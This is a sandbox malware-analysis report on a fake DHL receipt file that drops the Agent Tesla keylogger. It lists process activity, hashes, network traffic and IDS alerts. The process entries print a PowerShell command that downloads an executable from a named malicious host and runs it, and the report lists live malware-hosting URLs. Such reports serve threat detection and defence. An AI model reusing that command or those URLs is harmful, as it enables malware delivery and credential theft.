File name: dhl_receipt_receipt_sofia.mht
Full analysis: https://app.any.run/tasks/b4613e10-6c79-447f-8098-ee649282ef6f
Verdict: Malicious activity
Threats: Agent Tesla
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold.

Analysis date: July 17, 2019, 11:32:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: opendir, loader, autoit, keylogger, agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: ABB4D022686FA1836E4B992F09AB2E72
SHA1: A2D700F2A247F86D417C74CE7A5241FB92891890
SHA256: 7BAD8B7FEB1C0022F724BB75B403740F2E60EA3343ADCF7F693DD4D65AA48BF9
SSDEEP: 6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ93rWNmdofTQNZ8vn:4Q0AQQYf2j3VTr93rsnfTQNav

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Downloads executable files from the Internet: powershell.exe (PID: 3044)
    • Executes PowerShell scripts: cmd.exe (PID: 2176)
    • Application was dropped or rewritten from another process: vnnv.exe (PID: 3268), brk.exe (PID: 2916), brk.exe (PID: 2604)
    • AGENTTESLA was detected: RegSvcs.exe (PID: 3072)
  • SUSPICIOUS
    • Executed via COM: mshta.exe (PID: 3356), DllHost.exe (PID: 3220)
    • Executes scripts: vnnv.exe (PID: 3268)
    • Drops AutoIt3 executable file: vnnv.exe (PID: 3268)
    • Executable content was dropped or overwritten: powershell.exe (PID: 3044), vnnv.exe (PID: 3268)
    • Starts CMD.EXE for command execution: mshta.exe (PID: 3356)
    • Creates files in the user directory: powershell.exe (PID: 3044)
    • Application launched itself: brk.exe (PID: 2916)
    • Reads Windows Product ID: RegSvcs.exe (PID: 3072)
  • INFO
    • Reads Internet Cache Settings: iexplore.exe (PID: 3364), iexplore.exe (PID: 3596), iexplore.exe (PID: 3788)
    • Reads Microsoft Office registry keys: iexplore.exe (PID: 3364)
    • Reads Internet Explorer settings: mshta.exe (PID: 3356), iexplore.exe (PID: 3596), iexplore.exe (PID: 3788)
    • Creates files in the user directory: iexplore.exe (PID: 3788)
    • Changes internet zones settings: iexplore.exe (PID: 3364)
    • Reads settings of System Certificates: iexplore.exe (PID: 3364)
    • Application launched itself: iexplore.exe (PID: 3364)
    • Dropped object may contain Bitcoin addresses: vnnv.exe (PID: 3268)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
Total processes: 45
Monitored processes: 12
Malicious processes: 3
Suspicious processes: 4

Behavior graph (process nodes, in launch order):
start → drop and start → iexplore.exe → iexplore.exe (no specs) → iexplore.exe → mshta.exe → cmd.exe (no specs) → powershell.exe → vnnv.exe → PhotoViewer.dll (no specs) → wscript.exe (no specs) → brk.exe (no specs) → brk.exe (no specs) → #AGENTTESLA regsvcs.exe (no specs)

Process information

PID 3364 | Parent process: explorer.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\dhl_receipt_receipt_sofia.mht
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Internet Explorer | Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3596 | Parent process: iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:79873
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Internet Explorer | Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3788 | Parent process: iexplore.exe
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:137473
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: LOW
  Description: Internet Explorer | Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3356 | Parent process: svchost.exe
  CMD: C:\Windows\System32\mshta.exe -Embedding
  Path: C:\Windows\System32\mshta.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Microsoft (R) HTML Application host | Exit code: 0 | Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2176 | Parent process: mshta.exe
  CMD: "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','%temp%\vnnv.exe'); Start '%temp%\vnnv.exe'
  Path: C:\Windows\System32\cmd.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Windows Command Processor | Exit code: 0 | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3044 | Parent process: cmd.exe
  CMD: powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','C:\Users\admin\AppData\Local\Temp\vnnv.exe'); Start 'C:\Users\admin\AppData\Local\Temp\vnnv.exe'
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Windows PowerShell | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3268 | Parent process: powershell.exe
  CMD: "C:\Users\admin\AppData\Local\Temp\vnnv.exe"
  Path: C:\Users\admin\AppData\Local\Temp\vnnv.exe
  User: admin | Integrity Level: MEDIUM | Exit code: 0

PID 3220 | Parent process: svchost.exe
  CMD: C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
  Path: C:\Windows\system32\DllHost.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: COM Surrogate | Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 1672 | Parent process: vnnv.exe
  CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\61346614\add.vbs"
  Path: C:\Windows\System32\WScript.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM
  Description: Microsoft ® Windows Based Script Host | Exit code: 0 | Version: 5.8.7600.16385

PID 2916 | Parent process: WScript.exe
  CMD: "C:\Users\admin\AppData\Local\Temp\61346614\brk.exe" snb=uiw
  Path: C:\Users\admin\AppData\Local\Temp\61346614\brk.exe
  User: admin | Company: AutoIt Team | Integrity Level: MEDIUM
  Description: AutoIt v3 Script | Exit code: 0 | Version: 3, 3, 14, 4
Total events: 2 137
Read events: 1 902
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 3
Text files: 65
Unknown types: 6

Dropped files

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3364 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | | | |
| 3364 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | | | |
| 3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | 0BECF2F991661E5C679568C79216E0BE | 01154F3F8A90378911859430F58B078503E58532B44AA57BB4F7122CB3735AFA |
| 3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071720190718\index.dat | dat | FA65EB20A031F0927689F0C3A5E202D3 | 1A99DFFD91E1E8D0A4953EC51C2DE75D207B70DAB7E5DEDCFEA62110E5998A57 |
| 3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkE7F2.tmp | text | 5802850DF1DF6128C5AF93230BC19CD4 | 08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8 |
| 3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | 6CA9752A59010A03AB29B106C00DE194 | 0FC70631B554426848FC64AC3DCC4611775CA7B9F8BBC7921DF346B6D66C7FAD |
| 3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071720190718\index.dat | dat | 9A8553ED6380746E6B4D42F3682F5F66 | F801C74F3E6752756978B2FBB0F99879830A4F519A07A78F1929DD620A85613C |
| 3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\wbkE698.tmp | text | 5802850DF1DF6128C5AF93230BC19CD4 | 08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8 |
| 3356 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\dhl_receipt_receipt_sofia[1].hta | html | FD9AF6BBDDBC3F7A7457FC9373DF5FCD | 030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F |
| 3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SJ2B48XV\dhl_receipt_receipt_sofia[1].hta | html | FD9AF6BBDDBC3F7A7457FC9373DF5FCD | 030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 4
TCP/UDP connections: 4
DNS requests: 3
Threats: 0

HTTP requests

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3788 | iexplore.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
| 3356 | mshta.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
| 3044 | powershell.exe | GET | 200 | 103.1.208.220:80 | http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe | VN | executable | 1.50 Mb | suspicious |
| 3364 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
Connections

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3364 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
| 3356 | mshta.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
| 3788 | iexplore.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
| 3044 | powershell.exe | 103.1.208.220:80 | jpf.edu.vn | CHT Compamy Ltd | VN | suspicious |

DNS requests

| Domain | IP | Reputation |
|---|---|---|
| www.bing.com | 204.79.197.200, 13.107.21.200 | whitelisted |
| elkom.express | 94.156.77.35 | suspicious |
| jpf.edu.vn | 103.1.208.220 | suspicious |

Threats

| PID | Process | Class | Message |
|---|---|---|---|
| 3788 | iexplore.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
| 3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
| 3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |
| 3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of document.write % Encoding |
| 3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of parseInt % Encoding |
| 3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of unescape % Encoding |
| 3356 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
| 3356 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
| 3356 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
| 3356 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |
No debug info